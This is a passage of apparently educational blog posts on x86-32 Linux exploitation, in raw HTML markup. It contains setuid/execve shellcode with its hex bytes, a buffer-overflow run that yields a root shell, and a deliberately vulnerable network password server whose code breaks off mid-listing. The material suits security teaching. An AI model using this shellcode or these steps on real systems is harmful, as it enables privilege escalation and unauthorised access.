class="normal"48/span/span span class="code-line"span class="normal"49/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="c1"; run /bin/bash/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="k"global/spanspan class="w" /spanspan class="nv"_start/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="k"section/spanspan class="w" /spanspan class="nv".text/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="nl"_start:/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="nf"jmp/spanspan class="w" /spanspan class="nv"short/spanspan class="w" /spanspan class="nv"Call_shellcode/spanspan class="w" /spanspan class="c1"; jump to where our string is/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="nl"shellcode:/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="nf"xor/spanspan class="w" /spanspan class="nb"eax/spanspan class="p",/spanspan class="w" /spanspan class="nb"eax/spanspan class="w" /spanspan class="c1"; zero out eax/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"mov/spanspan class="w" /spanspan class="nb"al/spanspan class="p",/spanspan class="w" /spanspan class="mh"0x17/spanspan class="w" /spanspan class="c1"; put 23 into eax to setuid/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"xor/spanspan class="w" /spanspan class="nb"ebx/spanspan class="p",/spanspan class="w" /spanspan class="nb"ebx/spanspan class="w" /spanspan class="c1"; zero out ebx/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"int/spanspan class="w" /spanspan class="mh"0x80/spanspan class="w" /spanspan class="c1"; make the syscall setuid/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"mov/spanspan class="w" /spanspan class="nb"eax/spanspan class="p",/spanspan class="w" /spanspan class="nb"ebx/spanspan class="w" /spanspan class="c1"; zero out eax/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"pop/spanspan class="w" /spanspan class="nb"ebx/spanspan class="w" /spanspan class="c1"; pop the address of our string into ebx/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="c1"; which is the first argument to execve/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"mov/spanspan class="w" /spanspan class="p"[/spanspan class="nb"ebx/spanspan class="w" /spanspan class="o"+/spanspan class="mi"9/spanspan class="p"],/spanspan class="w" /spanspan class="nb"al/spanspan class="w" /spanspan class="c1"; put a 0 where the A is to null/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="c1"; terminate the /bin/bash string/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"mov/spanspan class="w" /spanspan class="nb"al/spanspan class="p",/spanspan class="w" /spanspan class="mh"0xb/spanspan class="w" /spanspan class="c1"; put the sys call number 11 into eax/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"mov/spanspan class="w" /spanspan class="p"[/spanspan class="nb"ebx/spanspan class="w" /spanspan class="o"+/spanspan class="mi"10/spanspan class="p"],/spanspan class="w" /spanspan class="nb"ebx/spanspan class="w" /spanspan class="c1"; put a pointer to the beginning/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="c1"; of the string where the BBBB is/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"xor/spanspan class="w" /spanspan class="nb"ecx/spanspan class="p",/spanspan class="w" /spanspan class="nb"ecx/spanspan class="w" /spanspan class="c1"; zero out the ecx register/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"mov/spanspan class="w" /spanspan class="p"[/spanspan class="nb"ebx/spanspan class="w" /spanspan class="o"+/spanspan class="mi"14/spanspan class="p"],/spanspan class="w" /spanspan class="nb"ecx/spanspan class="w" /spanspan class="c1"; replace the CCCC with 0000/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"lea/spanspan class="w" /spanspan class="nb"ecx/spanspan class="p",/spanspan class="w" /spanspan class="p"[/spanspan class="nb"ebx/spanspan class="w" /spanspan class="o"+/spanspan class="mi"10/spanspan class="p"]/spanspan class="w" /spanspan class="c1"; load the address that used to/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="c1"; point to BBBB into ecx the second/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="c1"; argument to execve/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"lea/spanspan class="w" /spanspan class="nb"edx/spanspan class="p",/spanspan class="w" /spanspan class="p"[/spanspan class="nb"ebx/spanspan class="w" /spanspan class="o"+/spanspan class="mi"14/spanspan class="p"]/spanspan class="w" /spanspan class="c1"; load the address that used to/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="c1"; point to CCCC into edx the third/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="c1"; argument to execve/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"int/spanspan class="w" /spanspan class="mh"0x80/spanspan class="w" /spanspan class="c1"; execute the syscall execve/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="nl"Call_shellcode:/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="nf"call/spanspan class="w" /spanspan class="nv"shellcode/spanspan class="w" /spanspan class="c1"; call the start of the actual application/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="nl"shell:/spanspan class="w" /spanspan class="kd"db/spanspan class="w" /spanspan class="s"quot;/bin/bashABBBBCCCCquot;/spanspan class="w" /spanspan class="c1"; our string of/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="c1"; arguments to execve/spanspan class="w"/span/span span class="code-line"/code/pre/div /td/tr/table pThis is the same as before except I added a call to setuid before it starts setting up the call to execve. Let's first make sure it works:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/span span class="code-line"span class="normal"25/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"testuser@dev:~$ /spannasm -f elf32 -o shell2.o shell2.nasm/span span class="code-line"span class="gp"testuser@dev:~$ /spanld -o shell2 shell2.o/span span class="code-line"span class="gp"testuser@dev:~$ /spanobjdump -d ./shell2span class="p"|/spangrep span class="s1"#39;[0-9a-f]:#39;/spanspan class="p"|/spangrep -v span class="s1"#39;file#39;/spanspan class="p"|/spancut -f2 -d:span class="p"|/spancut -f1-6 -dspan class="s1"#39; #39;/spanspan class="p"|/spantr -s span class="s1"#39; #39;/spanspan class="p"|/spantr span class="s1"#39;\t#39;/span span class="s1"#39; #39;/spanspan class="p"|/spansed span class="s1"#39;s/ $//g#39;/spanspan class="p"|/spansed span class="s1"#39;s/ /\\x/g#39;/spanspan class="p"|/spanpaste -d span class="s1"#39;#39;/span -s span class="p"|/spansed span class="s1"#39;s/^/quot;/#39;/spanspan class="p"|/spansed span class="s1"#39;s/$/quot;/g#39;/span/span span class="code-line"span class="go"quot;\xeb\x20\x31\xc0\xb0\x17\x31\xdb\xcd\x80\x89\xd8\x5b\x88\x43\x09\xb0\x0b\x89\x5b\x0a\x31\xc9\x89\x4b\x0e\x8d\x4b\x0a\x8d\x53\x0e\xcd\x80\xe8\xdb\xff\xff\xff\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\x41\x42\x42\x42\x42\x43\x43\x43\x43quot;/span/span span class="code-line"span class="gp"testuser@dev:~$ /spancat shellcode.c/span span class="code-line"span class="gp"#/spanincludelt;stdio.hgt;/span span class="code-line"span class="gp"#/spanincludelt;string.hgt;/span span class="code-line"/span span class="code-line"span class="go"unsigned char code[] = \/span/span span class="code-line"span class="go"quot;\xeb\x20\x31\xc0\xb0\x17\x31\xdb\xcd\x80\x89\xd8\x5b\x88\x43\x09\xb0\x0b\x89\x5b\x0a\x31\xc9\x89\x4b\x0e\x8d\x4b\x0a\x8d\x53\x0e\xcd\x80\xe8\xdb\xff\xff\xff\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\x41\x42\x42\x42\x42\x43\x43\x43\x43quot;;/span/span span class="code-line"/span span class="code-line"span class="go"main()/span/span span class="code-line"span class="go"{/span/span span class="code-line"/span span class="code-line"span class="go" printf(quot;Shellcode Length: %d\nquot;, strlen(code));/span/span span class="code-line"/span span class="code-line"span class="go" int (*ret)() = (int(*)())code;/span/span span class="code-line"/span span class="code-line"span class="go" ret();/span/span span class="code-line"/span span class="code-line"span class="go"}/span/span span class="code-line"span class="gp"testuser@dev:~$ /spangcc -z execstack -o shellcode shellcode.c/span span class="code-line"span class="gp"testuser@dev:~$ /span./shellcode/span span class="code-line"span class="go"Shellcode Length: 57/span/span span class="code-line"span class="gp"testuser@dev:/home/testuser$/span/span span class="code-line"/code/pre/div /td/tr/table pThat seems to work, let's test it out:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/span span class="code-line"span class="normal"5/span/span span class="code-line"span class="normal"6/span/span span class="code-line"span class="normal"7/span/span span class="code-line"span class="normal"8/span/span span class="code-line"span class="normal"9/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"testuser@dev:~$ /spanspan class="nb"export/span span class="nv"SHELLCODE/spanspan class="o"=/spanspan class="k"$(/spanpython -c span class="s1"#39;print quot;\x90quot; * 500 + quot;\xeb\x20\x31\xc0\xb0\x17\x31\xdb\xcd\x80\x89\xd8\x5b\x88\x43\x09\xb0\x0b\x89\x5b\x0a\x31\xc9\x89\x4b\x0e\x8d\x4b\x0a\x8d\x53\x0e\xcd\x80\xe8\xdb\xff\xff\xff\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\x41\x42\x42\x42\x42\x43\x43\x43\x43quot;#39;/spanspan class="k")/span/span span class="code-line"span class="gp"testuser@dev:~$ /span./getenvaddr SHELLCODE ./app/span span class="code-line"span class="go"SHELLCODE will be at 0xbffff76c/span/span span class="code-line"span class="gp"testuser@dev:~$ ./app $/spanspan class="o"(/spanpython -c span class="s1"#39;print quot;Aquot; * 528 + quot;\x6c\xf7\xff\xbfquot;#39;/spanspan class="o")/span/span span class="code-line"span class="gp"root@dev:/home/testuser# /spanwhoami/span span class="code-line"span class="go"root/span/span span class="code-line"span class="gp"root@dev:/home/testuser# /spancat secret.txt/span span class="code-line"span class="go"This is a top secret file!/span/span span class="code-line"span class="go"Only people with the password should be able to view this file!/span/span span class="code-line"/code/pre/div /td/tr/table pPWNED!!! :-D/p h2Conclusion/h2 pIt's very important to understand that when you are developing exploits you are always going to run into problems, that is why I left the bit in here where I didn't get root access. You will fail over and over again but if you continue trying you will find a way to hack it in the end. /p pThis was one of the simplest examples possible but before continuing it is important that you are able to do this. Don't worry if you don't understand how the application execution was hijacked or how the stack works, I will explain all of that in later tutorials when it is absolutely necessary, this tutorial is already long enough without going into more depth./p pI hope you enjoyed reading this as much as I enjoyed writing it./p pHappy Hacking :-)/p

pThis is the third part in our series on exploit research on x86-32 Linux systems. a href="/x86-32-linux/2014/05/08/plain-buffer-overflow/"Part 1/a was an introduction into a href="http://en.wikipedia.org/wiki/Buffer_overflow" target="_blank"buffer overflows/a and a href="/x86-32-linux/2014/05/20/plain-format-string-vulnerability/"part 2/a was an introduction to a href="http://en.wikipedia.org/wiki/Uncontrolled_format_string" target="_blank"format string vulnerabilities/a./p pBoth of the previous posts have been targeting local applications, here I will introduce remote exploitation and try to describe the differences between exploiting a local or a remote application while demonstrating remote exploitation./p !-- more -- h2The Vulnerable App/h2 pI've tried to keep the application as similar to the application we used in part 1 and 2 as possible, obviously some changes needed to be made:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/span span class="code-line"span class="normal"25/span/span span class="code-line"span class="normal"26/span/span span class="code-line"span class="normal"27/span/span span class="code-line"span class="normal"28/span/span span class="code-line"span class="normal"29/span/span span class="code-line"span class="normal"30/span/span span class="code-line"span class="normal"31/span/span span class="code-line"span class="normal"32/span/span span class="code-line"span class="normal"33/span/span span class="code-line"span class="normal"34/span/span span class="code-line"span class="normal"35/span/span span class="code-line"span class="normal"36/span/span span class="code-line"span class="normal"37/span/span span class="code-line"span class="normal"38/span/span span class="code-line"span class="normal"39/span/span span class="code-line"span class="normal"40/span/span span class="code-line"span class="normal"41/span/span span class="code-line"span class="normal"42/span/span span class="code-line"span class="normal"43/span/span span class="code-line"span class="normal"44/span/span span class="code-line"span class="normal"45/span/span span class="code-line"span class="normal"46/span/span span class="code-line"span class="normal"47/span/span span class="code-line"span class="normal"48/span/span span class="code-line"span class="normal"49/span/span span class="code-line"span class="normal"50/span/span span class="code-line"span class="normal"51/span/span span class="code-line"span class="normal"52/span/span span class="code-line"span class="normal"53/span/span span class="code-line"span class="normal"54/span/span span class="code-line"span class="normal"55/span/span span class="code-line"span class="normal"56/span/span span class="code-line"span class="normal"57/span/span span class="code-line"span class="normal"58/span/span span class="code-line"span class="normal"59/span/span span class="code-line"span class="normal"60/span/span span class="code-line"span class="normal"61/span/span span class="code-line"span class="normal"62/span/span span class="code-line"span class="normal"63/span/span span class="code-line"span class="normal"64/span/span span class="code-line"span class="normal"65/span/span span class="code-line"span class="normal"66/span/span span class="code-line"span class="normal"67/span/span span class="code-line"span class="normal"68/span/span span class="code-line"span class="normal"69/span/span span class="code-line"span class="normal"70/span/span span class="code-line"span class="normal"71/span/span span class="code-line"span class="normal"72/span/span span class="code-line"span class="normal"73/span/span span class="code-line"span class="normal"74/span/span span class="code-line"span class="normal"75/span/span span class="code-line"span class="normal"76/span/span span class="code-line"span class="normal"77/span/span span class="code-line"span class="normal"78/span/span span class="code-line"span class="normal"79/span/span span class="code-line"span class="normal"80/span/span span class="code-line"span class="normal"81/span/span span class="code-line"span class="normal"82/span/span span class="code-line"span class="normal"83/span/span span class="code-line"span class="normal"84/span/span span class="code-line"span class="normal"85/span/span span class="code-line"span class="normal"86/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;sys/socket.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;netinet/in.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;stdio.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;strings.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;stdlib.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;string.hgt;/spanspan class="cp"/span/span span class="code-line"/span span class="code-line"span class="cp"#define PASS quot;topsecretpasswordquot;/span/span span class="code-line"span class="cp"#define SFILE quot;secret.txtquot;/span/span span class="code-line"span class="cp"#define PORT 9999/span/span span class="code-line"/span span class="code-line"span class="kt"void/spanspan class="w" /spanspan class="nf"sendfile/spanspan class="p"(/spanspan class="kt"int/spanspan class="w" /spanspan class="n"connfd/spanspan class="p",/spanspan class="w" /spanspan class="k"struct/spanspan class="w" /spanspan class="nc"sockaddr_in/spanspan class="w" /spanspan class="n"cliaddr/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="kt"void/spanspan class="w" /spanspan class="nf"senderror/spanspan class="p"(/spanspan class="kt"int/spanspan class="w" /spanspan class="n"connfd/spanspan class="p",/spanspan class="w" /spanspan class="k"struct/spanspan class="w" /spanspan class="nc"sockaddr_in/spanspan class="w" /spanspan class="n"cliaddr/spanspan class="p",/spanspan class="w" /spanspan class="kt"char/spanspan class="w" /spanspan class="n"p/spanspan class="p"[]);/spanspan class="w"/span/span span class="code-line"span class="kt"int/spanspan class="w" /spanspan class="nf"checkpass/spanspan class="p"(/spanspan class="kt"char/spanspan class="w" /spanspan class="o"*/spanspan class="n"p/spanspan class="p");/spanspan class="w"/span/span span class="code-line"/span span class="code-line"/span span class="code-line"span class="kt"void/spanspan class="w" /spanspan class="nf"main/spanspan class="p"()/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"listenfd/spanspan class="p",/spanspan class="w" /spanspan class="n"connfd/spanspan class="p",/spanspan class="w" /spanspan class="n"n/spanspan class="p",/spanspan class="w" /spanspan class="n"c/spanspan class="p",/spanspan class="w" /spanspan class="n"r/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"struct/spanspan class="w" /spanspan class="nc"sockaddr_in/spanspan class="w" /spanspan class="n"servaddr/spanspan class="p",/spanspan class="w" /spanspan class="n"cliaddr/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"socklen_t/spanspan class="w" /spanspan class="n"clilen/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"pid_t/spanspan class="w" /spanspan class="n"childpid/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"char/spanspan class="w" /spanspan class="n"pwd/spanspan class="p"[/spanspan class="mi"1000/spanspan class="p"];/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="n"listenfd/spanspan class="o"=/spanspan class="n"socket/spanspan class="p"(/spanspan class="n"AF_INET/spanspan class="p",/spanspan class="n"SOCK_STREAM/spanspan class="p",/spanspan class="mi"0/spanspan class="p");/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="n"bzero/spanspan class="p"(/spanspan class="o"amp;/spanspan class="n"servaddr/spanspan class="p",/spanspan class="k"sizeof/spanspan class="p"(/spanspan class="n"servaddr/spanspan class="p"));/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"servaddr/spanspan class="p"./spanspan class="n"sin_family/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"AF_INET/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"servaddr/spanspan class="p"./spanspan class="n"sin_addr/spanspan class="p"./spanspan class="n"s_addr/spanspan class="o"=/spanspan class="n"htonl/spanspan class="p"(/spanspan class="n"INADDR_ANY/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"servaddr/spanspan class="p"./spanspan class="n"sin_port/spanspan class="o"=/spanspan class="n"htons/spanspan class="p"(/spanspan class="n"PORT/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"((/spanspan class="n"r/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"bind/spanspan class="p"(/spanspan class="n"listenfd/spanspan class="p",(/spanspan class="k"struct/spanspan class="w" /spanspan class="nc"sockaddr/spanspan class="w" /spanspan class="o"*/spanspan class="p")/spanspan class="o"amp;/spanspan class="n"servaddr/spanspan class="p",/spanspan class="k"sizeof/spanspan class="p"(/spanspan class="n"servaddr/spanspan class="p")))/spanspan class="w" /spanspan class="o"!=/spanspan class="w" /spanspan class="mi"0/spanspan class="p")/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;Error: Unable to bind to port %d/spanspan class="se"\n/spanspan class="s"quot;/spanspan class="p",/spanspan class="w" /spanspan class="n"PORT/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"exit/spanspan class="p"(/spanspan class="mi"1/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="n"listen/spanspan class="p"(/spanspan class="n"listenfd/spanspan class="p",/spanspan class="mi"1024/spanspan class="p");/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="k"for/spanspan class="p"(;;)/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"clilen/spanspan class="o"=/spanspan class="k"sizeof/spanspan class="p"(/spanspan class="n"cliaddr/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"connfd/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"accept/spanspan class="p"(/spanspan class="n"listenfd/spanspan class="p",(/spanspan class="k"struct/spanspan class="w" /spanspan class="nc"sockaddr/spanspan class="w" /spanspan class="o"*/spanspan class="p")/spanspan class="o"amp;/spanspan class="n"cliaddr/spanspan class="p",/spanspan class="o"amp;/spanspan class="n"clilen/spanspan class="p");/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="n"n/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"recvfrom/spanspan class="p"(/spanspan class="n"connfd/spanspan class="p",/spanspan class="w" /spanspan class="n"pwd/spanspan class="p",/spanspan class="w" /spanspan class="mi"1000/spanspan class="p",/spanspan class="w" /spanspan class="mi"0/spanspan class="p",/spanspan class="w" /spanspan class="p"(/spanspan class="k"struct/spanspan class="w" /spanspan class="nc"sockaddr/spanspan class="w" /spanspan class="o"*/spanspan class="p")/spanspan class="o"amp;/spanspan class="n"cliaddr/spanspan class="p",/spanspan class="w" /spanspan class="o"amp;/spanspan class="n"clilen/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"pwd/spanspan class="p"[/spanspan class="n"n/spanspan class="p"]/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="sc"#39;\0#39;/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"r/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"checkpass/spanspan class="p"(/spanspan class="n"pwd/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="n"r/spanspan class="w" /spanspan class="o"!=/spanspan class="w" /spanspan class="mi"0/spanspan class="p")/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"senderror/spanspan class="p"(/spanspan class="n"connfd/spanspan class="p",/spanspan class="w" /spanspan class="n"cliaddr/spanspan class="p",/spanspan class="w" /spanspan class="n"pwd/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w" /spanspan class="k"else/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"sendfile/spanspan class="p"(/spanspan class="n"connfd/spanspan class="p",/spanspan class="w" /spanspan class="n"cliaddr/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;Received the following:/spanspan class="se"\n/spanspan class="s"quot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;%s/spanspan class="se"\n/spanspan class="s"quot;/spanspan class="p",/spanspan class="w" /spanspan class="n"pwd/spanspan class="p");/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="n"close/spanspan class="p"(/spanspan class="n"connfd/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="kt"void/spanspan class="w" /spanspan class="nf"sendfile/spanspan class="p"(/spanspan class="kt"int/spanspan class="w" /spanspan class="n"connfd/spanspan class="p",/spanspan class="w" /spanspan class="k"struct/spanspan class="w" /spanspan class="nc"sockaddr_in/spanspan class="w" /spanspan class="n"cliaddr/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"FILE/spanspan class="w" /spanspan class="o"*/spanspan class="n"f/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"c/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"f/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"fopen/spanspan class="p"(/spanspan class="n"SFILE/spanspan class="p",/spanspan class="w" /spanspan class="s"quot;rquot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="n"f/spanspan class="p")/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"while/spanspan class="w" /spanspan class="p"((/spanspan class="n"c/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"getc/spanspan class="p"(/spanspan class="n"f/spanspan class="p"))/spanspan class="w" /spanspan class="o"!=/spanspan class="w" /spanspan class="n"EOF/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"sendto/spanspan class="p"(/spanspan class="n"connfd/spanspan class="p",/spanspan class="w" /spanspan class="o"amp;/spanspan class="n"c/spanspan class="p",/spanspan class="w" /spanspan class="mi"1/spanspan class="p",/spanspan class="w" /spanspan class="mi"0/spanspan class="p",/spanspan class="w" /spanspan class="p"(/spanspan class="k"struct/spanspan class="w" /spanspan class="nc"sockaddr/spanspan class="w" /spanspan class="o"*/spanspan class="p")/spanspan class="o"amp;/spanspan class="n"cliaddr/spanspan class="p",/spanspan class="k"sizeof/spanspan class="p"(/spanspan class="n"cliaddr/spanspan class="p"));/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"fclose/spanspan class="p"(/spanspan class="n"f/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w" /spanspan class="k"else/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;Error opening file: quot;/spanspan class="w" /spanspan class="n"SFILE/spanspan class="w" /spanspan class="s"quot;/spanspan class="se"\n/spanspan class="s"quot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"exit/spanspan class="p"(/spanspan class="mi"1/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="kt"void/spanspan class="w" /spanspan class="nf"senderror/spanspan class="p"(/spanspan class="kt"int/spanspan class="w" /spanspan class="n"connfd/spanspan class="p",/spanspan class="w" /spanspan class="k"struct/spanspan class="w" /spanspan class="nc"sockaddr_in/spanspan class="w" /spanspan class="n"cliaddr/spanspan class="p",/spanspan class="w" /spanspan class="kt"char/spanspan class="w" /spanspan class="n"p/spanspan class="p"[])/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"sendto/spanspan class="p"(/spanspan class="n"connfd/spanspan class="p",/spanspan class="w" /spanspan class="s"quot;Wrong password: quot;/spanspan class="p",/spanspan class="w" /spanspan class="mi"16/spanspan class="w" /spanspan class="p",/spanspan class="w" /spanspan class="mi"0/spanspan class="p",/spanspan class="w" /spanspan class="p"(/spanspan class="k"struct/spanspan class="w" /spanspan class="nc"sockaddr/spanspan class="w" /spanspan class="o"*/spanspan class="p")/spanspan class="o"amp;/spanspan class="n"cliaddr/spanspan class="p",/spanspan class="k"sizeof/spanspan class="p"(/spanspan class="n"cliaddr/spanspan class="p"));/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"sendto/spanspan class="p"(/spanspan class="n"connfd/spanspan class="p",/spanspan class="w" /spanspan class="n"p/spanspan class="p",/spanspan class="w" /spanspan class="n"strlen/spanspan class="p"(/spanspan class="n"p/spanspan class="p"),/spanspan class="w" /spanspan 